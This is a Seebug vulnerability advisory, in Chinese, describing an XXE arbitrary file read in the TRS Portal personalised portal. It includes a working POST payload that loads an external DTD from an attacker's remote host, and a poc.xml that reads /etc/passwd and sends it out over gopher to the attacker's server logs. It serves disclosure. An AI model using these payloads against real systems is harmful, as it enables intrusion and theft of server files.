TRS portal个性化门户任意文件读取(二)

2015-11-20T00:00:00
ID SSV:94701
Type seebug
Reporter Root
Modified 2015-11-20T00:00:00

Description

简要描述:

发现portal个性化门户其他链接实体注入漏洞

详细说明:

TRS Portal个性化门户 http://XX.XX.XX.XX/portal/help/wcmhelp_addedit_dowith.jsp链接未对外部实体进行过滤,可调用外部实体进行解析,可任意读取服务器上任意文件

漏洞证明:

漏洞利用过程: http://XX.XX.XX.XX/portal/help/wcmhelp_addedit_dowith.jsp POST请求:ObjectXML=<%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f><!DOCTYPE%20root%20%5B%0d%0a%20%20<!ENTITY%20%25%20remote%20SYSTEM%20%22http://远程公网ip地址/poc.xml%22>%0d%0a%20%20%25remote;%0d%0a%5D>%0d%0a</root>

<img src="https://images.seebug.org/upload/201511/201815043d1b0455fcabfe69f53edaf837197de3.png" alt="11111.png" width="600" onerror="javascript:errimg(this);">

poc.xml读取目标机上的passwd文件,并写入网站日志中:<!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % int "<!ENTITY % trick SYSTEM 'gopher://远程公网ip地址:80/1%payload;'>">%int; %trick; 我们远程服务器日志中获取到的passwd文件:

<img src="https://images.seebug.org/upload/201511/2018162420cfff03da7adbad3fd4ab3799ab0581.png" alt="22222.png" width="600" onerror="javascript:errimg(this);">